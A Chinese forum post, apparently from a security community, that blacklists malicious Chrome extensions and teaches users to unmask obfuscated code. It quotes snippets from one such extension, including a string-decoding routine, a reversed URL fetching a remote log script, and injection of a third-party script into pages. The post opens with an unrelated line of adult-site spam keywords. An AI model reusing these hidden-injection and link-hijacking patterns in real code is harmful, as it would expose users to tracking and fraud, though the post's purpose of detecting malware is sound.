国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

信，主要是考慮到腳本里無惡意代碼，且這些作品的作者都在卡飯活躍，如果有問題可以跟作者進(jìn)行交流反饋，其他還有很多熱心友善的作者的類似作品，這里就不一一列舉了）Adkill and Media Download作者xplsy http://bbs.kafan.cn/thread-1352326-1-1.html（這里只給出論壇地址，由于之前出現(xiàn)過此擴(kuò)展被商店意外下架，且之前商店里出現(xiàn)過相同擴(kuò)展和作者名稱的假冒作品，所以推薦大家在卡飯下載此擴(kuò)展）chrome在線視頻去廣告本地版作者yndoc以及15536900等會員的支持http://bbs.kafan.cn/thread-1514537-1-1.htmlYouKuAntiADs作者Harv.c（cinhoo） http://userscripts.org/scripts/show/119622OpenGG.Clean.Player作者OpenGG（魯夫的愛） http://userscripts.org/scripts/show/120679主頁http://opengg.meOpenGG.Clean.Player(Bae作者kawaiiushio（即本論壇＿一方通行）http://userscripts.org/scripts/show/162286等等。。。。。。如果你經(jīng)常網(wǎng)購，又實(shí)在不想讀代碼或完全搞不懂代碼的話，這里推薦一個擴(kuò)展Extension Automation，功能為設(shè)置指定擴(kuò)展在指定網(wǎng)站啟用或禁用（具體設(shè)置我玩的不多，我就不教大家怎么用了，自己折騰吧，有什么不明白的話可以來論壇發(fā)帖求助和討論），可以在一些涉及網(wǎng)購、網(wǎng)銀等網(wǎng)站里禁用一些擴(kuò)展的執(zhí)行，比如像那些視頻過濾擴(kuò)展，怎么想這樣的擴(kuò)展都不需要在這樣的網(wǎng)站里運(yùn)行吧，這樣設(shè)置這些擴(kuò)展禁止在這些網(wǎng)站里運(yùn)行，雖然不能治本，但至少可以讓更多用戶以最小的成本將損失降到最低，這樣的網(wǎng)站最好只放行ABP或ADB用來廣告過濾，其他可能有需要用到一些腳本，如nolazyload http://userscripts.org/scripts/show/151249，Super_preloader（作者為NLF、dindog、vokins、ttony等都是可信的），以及這些作者的其他作品等也可以放心啟用。由于每個用戶需求不同，而腳本和擴(kuò)展數(shù)量龐大，總做伸手黨也不是長久的辦法，所以建議不管是否懂代碼最好都要多少了解一些排查方法和經(jīng)驗(yàn)并養(yǎng)成使用前簡單的看看代碼的習(xí)慣，當(dāng)然如果你是像我這種不淘寶、不網(wǎng)購、無網(wǎng)銀、無微博、無人人、基本不訪問社交網(wǎng)站等的話，你可以無視，不過也不排除有其他形式的惡意行為，謹(jǐn)慎一些還是有好處的，在讀代碼的過程中也還是能學(xué)到一些東西的，尤其對于喜歡腳本的同學(xué)。黑名單（12月12日更新）總結(jié)：作者名字為xx推薦的建議多留心另外：目前來看這些惡意擴(kuò)展以視頻廣告過濾相關(guān)的居多，故還是使用主樓推薦的視頻過濾擴(kuò)展或腳本比較穩(wěn)妥作者：tools for chrome的擴(kuò)展谷歌快速翻譯(中-英)作者：www.pigtools.cn的擴(kuò)展小豬廣告殺手 (Pig Ad Killer)作者：優(yōu)酷去廣告的擴(kuò)展優(yōu)酷去廣告Html5作者：chrome大師的擴(kuò)展優(yōu)酷土豆廣告去除作者：獵豹的擴(kuò)展視頻廣告屏蔽 嗅探 下載作者：插件增強(qiáng)|漢化|破解的擴(kuò)展迅雷、快車、旋風(fēng)專用鏈自動轉(zhuǎn)換作者：微信的擴(kuò)展懸停預(yù)覽作者：chrome系統(tǒng)的擴(kuò)展迅雷-全系列迅雷原版-迅雷精簡版下載支持-迅雷下載（目前的版本可能把惡意代碼去掉了，但避免以后的版本再加上，暫不將此擴(kuò)展移除出黑名單）作者：微信的擴(kuò)展夜間模式作者：Ext Dev的擴(kuò)展視頻廣告屏蔽 + 嗅探 + 下載(3合1)超強(qiáng)版作者：谷歌推薦的擴(kuò)展優(yōu)酷視頻無廣告收藏夾書簽自動整理心理測試大全收藏夾一觸即發(fā)作者：谷歌音樂推薦的擴(kuò)展豆瓣電臺音悅臺蝦米音樂蝦米電臺百度隨身聽酷狗音樂多米電臺酷狗電臺酷我音樂作者：谷歌音樂盒的擴(kuò)展豆瓣電臺網(wǎng)絡(luò)音樂電臺音悅臺百度音樂隨身聽作者：www.haitaods.com的擴(kuò)展海淘大師 6pm 亞馬遜二合一插件作者：www.googleplugin.com的擴(kuò)展https://chrome.google.com/websto ... ww.googleplugin.com（這個作者www .googleplugin.com的擴(kuò)展我只看了前面的10個，都有可疑代碼，詳述http://bbs.kafan.cn/forum.php?mo ... 7003&fromuid=735385，不過現(xiàn)在擴(kuò)展貌似被下架了或是其他什么情況，在商店里找不到了，如果大家再遇到這個作者的作品要慎重一些了）作者：www.youkuchajian.com的擴(kuò)展視頻廣告殺手-優(yōu)酷廣告殺手土豆廣告殺手，愛奇藝廣告作者：視頻去廣告專家的擴(kuò)展Adblock中國加強(qiáng)版搜狐視頻去廣告優(yōu)酷 土豆 愛奇藝 搜狐去廣告視頻廣告殺手-優(yōu)酷廣告殺手土豆廣告殺手，愛奇藝廣告土豆廣告去除愛奇藝廣告去除優(yōu)酷全能助手作者：來自Google推薦的擴(kuò)展自動隱藏下載欄搜狐視頻去60秒廣告視頻廣告殺手-優(yōu)酷廣告殺手土豆廣告殺手，愛奇藝廣告作者：優(yōu)酷土豆的擴(kuò)展Sorry Youku 加強(qiáng)版opengg clean player 去廣告加強(qiáng)版土豆屏蔽廣告優(yōu)酷土豆去廣告作者：優(yōu)酷土豆廣告去除的擴(kuò)展酷6廣告去除土豆廣告去除視頻廣告殺手-優(yōu)酷廣告殺手土豆廣告殺手，愛奇藝廣告作者：豆瓣UX小組的擴(kuò)展PPS視頻去45秒廣告愛奇藝去45秒廣告魯夫的恥辱柱優(yōu)酷廣告殺手（已下架）此前有不少，不過有不少已經(jīng)下架，所以如果大家反饋的話僅反饋還在商店里蹦達(dá)的吧待補(bǔ)充。。。。。歡迎大家補(bǔ)充反饋另外，腳本中也有一些不良腳本，大部分腳本會在http://userscripts.org/scripts下載，這里集合了大量的優(yōu)質(zhì)腳本，極大的擴(kuò)展了Chrome的功能，但由于審核比商店還松，所以垃圾腳本也很多，由于腳本數(shù)量太多太雜，且發(fā)布不能代表官方，這里就不對這些的腳本進(jìn)行討論了，僅針對官方商店的擴(kuò)展進(jìn)行討論。不過我在最近瀏覽userscripts網(wǎng)站時發(fā)現(xiàn)一個作者在短時間里發(fā)布了大量的腳本，名稱各不相同，僅從名稱和介紹來看很多都是很有用的，但所有這些腳本的內(nèi)容都一樣，都是作用在facebook網(wǎng)站，也就是說腳本的功能跟腳本的名稱和介紹無半點(diǎn)關(guān)系，由于我沒用過facebook，不清楚這個腳本的具體作用，但從代碼上看多半是用來刷某些數(shù)據(jù)用的，這個作者名字為Facebookr，他的所有腳本http://userscripts.org/users/442265/scripts，和Facebook ready，他的所有腳本http://userscripts.org/users/442265/scripts，和Jack Powel，他的所有腳本http://userscripts.org/users/442265/scripts，建議大家慎用，同時也提醒大家在下載腳本時盡量使用有詳細(xì)介紹，并且能從擴(kuò)展名字和介紹就能大致知道這個腳本大致會在哪些網(wǎng)站生效，然后看看Source Code標(biāo)簽里代碼的include字段對應(yīng)的網(wǎng)站是否跟自己猜測的類似，最后再進(jìn)行選用。我目前遇到的惡意擴(kuò)展主要采用如下一些方式來執(zhí)行可疑代碼：一、js沒有對代碼進(jìn)行任何特殊處理，直接可以從代碼里讀出所執(zhí)行的功能，如果你對代碼一竅不通的話，可以通過搜索關(guān)鍵字來了解是否有可疑行為，使用文本編輯軟件（我個人用notepad2，可以通過顏色看出文本的類型，如字符串顯示為綠色，正則表達(dá)式為棕色還是土黃色？）來查看代碼，主要查看綠色的字符串和棕色的正則式，不需要懂正則式，因?yàn)橥ǔＫ麄儾粫岩ヅ涞淖址蚓W(wǎng)址在正則式里進(jìn)行特殊處理，所以跟字符串一樣能很容易的看出有效內(nèi)容，然后看這些字符串里是否含有checkout、account、shop等明顯的涉及網(wǎng)銀、賬號等的字符或是一些如淘寶、天貓、亞馬遜等交易類網(wǎng)站的網(wǎng)址關(guān)鍵字，如果有的話就要慎重使用了，具體是否危險(xiǎn)，可以看看代碼里是否有replace之類的替換方法來替換鏈接里的關(guān)鍵字，另外看看代碼里有沒有加載第三方網(wǎng)址和js，通常是http://開頭的字符串，具體這些第三方網(wǎng)址或js是否危險(xiǎn)只能查看這些網(wǎng)頁或js的源碼來判斷了二、將關(guān)鍵功能的代碼順序打亂，根據(jù)某個自定義函數(shù)來把這樣的代碼進(jìn)行組合并執(zhí)行。這樣的代碼可以在notepad2查看，看看里面的字符串?dāng)?shù)據(jù)：如果字符串類似base64;image/png,…之類的表示的是base64編碼的圖片，這是安全的；如果字符串很長，無標(biāo)點(diǎn)，無符號，只有a-z0-9字符的話通常是安全的（當(dāng)然也有可能是被很復(fù)雜的方法進(jìn)行了編碼或排序，這種情況下我也沒辦法了）；如果字符串里含有標(biāo)點(diǎn)或有%、0x、\u、\x等之類的話很有可能是對字符串進(jìn)行了編碼轉(zhuǎn)換，這個時候可以看看這個字符串是否使用了一個自定義的函數(shù)進(jìn)行處理：1、例如視頻廣告殺手-優(yōu)酷廣告殺手土豆廣告殺手，愛奇藝廣告https://chrome.google.com/websto ... kgfpipnonjehcmcieeo擴(kuò)展，里面的my.js有個if (tab.url.indexOf(dd('w.wdwgsutre.rcoom','cf84')) > -1 &&tab.url.indexOf(dd('atidc','c822')) > -1&&tab.url.indexOf(dd('cmohreknli','38c4'))< 0&&tab.url.indexOf(dd('hceckout','a16d'))< 0&&tab.url.indexOf(dd('ocucant','ccbd'))< 0&&tab.url.indexOf(dd('tphts3/%A/','7ac1'))< 0&&tab.url.indexOf(dd('sohpping','33bd'))< 0&&tab.url.indexOf(dd('feudalt','a4a9'))< 0)復(fù)制代碼，被’’引號引用的部分就是字符串，這些字符串很亂，不是正常的單詞，而這個字符串被一個dd函數(shù)調(diào)用，而查看js里的dd函數(shù)，如下function dd(a,k){var arr = a.split('');var str_key='';var key=parseInt('0x'+k).toString();for(i in key){str_key+=‘$’+key[i];}var ret=a['erlpcae'['replace'](/(.)(.)/g, '$2$1')](/(.)(.)(.)(.)(.)/g,str_key);return unescape(ret);};復(fù)制代碼函數(shù)的具體功能不需要太在意，可以簡單的看出這個函數(shù)的功能僅僅是對字符串本身進(jìn)行轉(zhuǎn)換處理，而不是以字符串為參數(shù)執(zhí)行某一些實(shí)際有用的操作，通常來說如果作者是想防抄襲的話會對代碼的執(zhí)行流程和代碼指令等進(jìn)行加密或重新編碼或重排列或其他更高級的方法來隱藏指令，而不是僅對字符串參數(shù)進(jìn)行處理，所以這個時候基本可以看出這個擴(kuò)展想要執(zhí)行一些不想讓人知道的操作，說明這個腳本的功能很可疑，如果想要進(jìn)一步的查看到底是執(zhí)行了哪些操作，可以在Chrome的審查元素-console欄里復(fù)制那個dd函數(shù)，然后例如要查看dd('w.wdwgsutre.rcoom','cf84')所代表的內(nèi)容，就在那個dd函數(shù)之后添加console.log(dd('w.wdwgsutre.rcoom','cf84'))即添加到console.log()里回車即可打印出www.drugstore.com復(fù)制代碼，其他類似的都可以采用這樣的方法得到原始代碼，然后再對代碼進(jìn)行排查；2、例如還是這個擴(kuò)展，里面的background.js里有個a.open("GET","sj.gol/gol/moc.oatiahi5.emorhc//:ptth".split("").reverse().join(""),!0);大家可以看出來這個字符串很像更網(wǎng)址，但順序很亂，實(shí)際上這個字符串是把一個網(wǎng)址倒序排列了，然后使用split(“”)把字符串分割放到數(shù)組里，再使用reverse()（用來倒序排列數(shù)組）函數(shù)來把數(shù)組再倒序排列，最后用join(“”)把數(shù)組組合成字符串，簡單的方法可以把"sj.gol/gol/moc.oatiahi5.emorhc//:ptth".split("").reverse().join("")放到console.log()里打印出http://chrome.5ihaitao.com/log/log.js復(fù)制代碼這個結(jié)果；3、例如還是這個擴(kuò)展，里面的showicon.js里有個var _$=的定義，后面的內(nèi)容可以看到是由很多網(wǎng)址或關(guān)鍵字組成的數(shù)組，然后后面出現(xiàn)了多個replace、chrome.webRequest.onBeforeRequest.addListener等方法用來替換指定的網(wǎng)站或關(guān)鍵字，（這里簡單的說下，擴(kuò)展通過manifest文件來定義某個html或js的作用，如果js是在content_scripts字段里，說明這個js是直接加載在網(wǎng)頁里的，即只能在指定網(wǎng)頁里加載生效；如果html或js由這個html調(diào)用在popup里是由通過點(diǎn)擊來觸發(fā)操作；如果html或js或這個js由這個html調(diào)用的被放在background字段里，說明這個js是一個獨(dú)立進(jìn)程，且這個js不會對網(wǎng)頁內(nèi)容執(zhí)行操作，（除非js里使用了chrome.tabs.executeScript方法在指定標(biāo)簽注入代碼，或使用chrome.extension.onRequest.addListener等方法與js進(jìn)行信息傳遞，一般比較少見，這里不做更多討論），這個js通常是用來對瀏覽器全局進(jìn)行操作的，如對各個標(biāo)簽進(jìn)行一些操作：新建標(biāo)簽、修改、關(guān)閉等，地址欄或工具欄添加圖標(biāo)和點(diǎn)擊觸發(fā)一些操作等，添加鼠標(biāo)右鍵菜單，修改地址欄里的地址等，而這個showicon.js正在background進(jìn)程里，并且其他background的代碼里也沒有chrome.tabs.executeScript和chrome.extension.onRequest.addListener等，所以里面的代碼不會對網(wǎng)頁內(nèi)容產(chǎn)生影響）其中replace方法很顯然是對地址欄里的地址進(jìn)行替換，這個替換過程是顯式的，即可以看到明顯的跳轉(zhuǎn)和頁面刷新過程，而其中也使用了chrome.webRequest.onBeforeRequest.addListener和webRequest.onBeforeSendHeaders.addListener來直接修改資源請求的數(shù)據(jù)頭，也就是跟referchange擴(kuò)展的方法一樣，來在后臺隱式的加載替換后的鏈接，當(dāng)然這里不是說replace和webRequest.onBeforeSendHeaders.addListener等方法有問題，而是說這個js執(zhí)行的操作是把用戶的操作轉(zhuǎn)向了_$里定義的網(wǎng)址，而從這些網(wǎng)址和要替換的關(guān)鍵字可以看出這個js很危險(xiǎn)；4、例如還是這個擴(kuò)展，里面的runtb.js，前面的部分應(yīng)該是jquery代碼，有點(diǎn)復(fù)雜，看不懂，但后面的$(document).ready(function(){var href = location.href;console.log(href);if( href.indexOf("www.baidu.com") > 0)           {addbaidu();}else if( href.indexOf("tieba.baidu.com/p/") > 0)     {addtieba();}else if(href.indexOf("google.com.hk") > 0)   {addgg();}else if(href.indexOf("hao123.com") > 0)   {addhao123();}else if(href.indexOf("hao.#") > 0)   {add360();}else if(href.indexOf("2345.com") > 0)   {add2345();}else if(href.indexOf("www.bilibili.tv") > 0)   {addbb();}});部分以及下面的具體的addx函數(shù)可以很清楚的看出來是要在這些網(wǎng)站里添加一個網(wǎng)站的推廣，既然是推廣我就不給出具體網(wǎng)址了，大家可以自己去擴(kuò)展里看把；5、例如還是這個擴(kuò)展，里面的contentScripts.js，前面的代碼貌似沒什么問題，但在最后在頁面里加載了一個第三方的jsvar s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = 'http://chrome.5ihaitao.com/cnzz.js';document.body.appendChild(s);（說實(shí)話，真的很感謝這個作者讓我對代碼的編寫藝術(shù)有了更深的理解）；6、例如有的js里有個eval（重新運(yùn)算求出參數(shù)的內(nèi)容），而里面的內(nèi)容比較復(fù)雜也比較亂，不是普通的字符串，這個時候可以把eval改成console.log，然后把整個代碼復(fù)制到審查元素里即可打印出代碼的本來面目，有的可能進(jìn)行了多次轉(zhuǎn)換，如果打印出的代碼里仍有eval就繼續(xù)改成console.log來打印，最終會得到正常形式的代碼，這里有詳述http://bbs.kafan.cn/forum.php?mo ... &fromuid=735385；7、例如愛奇藝去45秒廣告，里面bg.js的內(nèi)容很復(fù)雜，倒不是說代碼執(zhí)行的操作復(fù)雜，而是把所有的關(guān)鍵指令都進(jìn)行了編碼（例如\uXXXX、\xXX之類的格式）并放在一個自定義的數(shù)組里，然后在下面的代碼里通過數(shù)組索引來調(diào)用，可以把這個數(shù)組整個放到console.log里打印出正常的字符串，然后再根據(jù)下面的數(shù)組索引來把相應(yīng)指令替換進(jìn)去，過程比較繁瑣，替換完后就可以看看是否有replace等替換操作了。而這個js里的數(shù)組打印出來后可以看到它請求了一個外部的jshttp://mnybag.b0.upaiyun.com/bootstrapmin.js，在瀏覽器里打開這個js后得出的代碼格式與這個bg.js一樣，需要轉(zhuǎn)換一下數(shù)組里的編碼，而這個js里有請求兩個外部的地址：http://baidu-analytics.com/minad_baidu.js和http://s.click.taobao.com/t_js。。。；8、目前我遇到的類型就這些，其他的待補(bǔ)充。。。歡迎大家指正。另外，還有一些經(jīng)驗(yàn)，打開擴(kuò)展界面多看看介紹（非中文版的擴(kuò)展相對而已一般會安全些，因?yàn)槔贤庥植粫μ詫毜确道信d趣吧，當(dāng)然這也不是絕對的），然后看評價(jià)，通常來說，擴(kuò)展是開源的，多半也是非盈利性質(zhì)的，也就是說大部分作品的靠的是作者的熱心，所以他們通常也就不會王婆賣瓜自賣自夸了，評論里的內(nèi)容多半差別就會比較大，因?yàn)楫吘勾蠹译y得登錄商店（你懂的）也就不會像逛論壇、貼吧之類的去灌水吧，回復(fù)的評論自然是自己的看法了，那么如果評論里清一色的只夸擴(kuò)展，而很少使用反饋，且這樣的評論很集中，這就可能是有人在刷好評了評分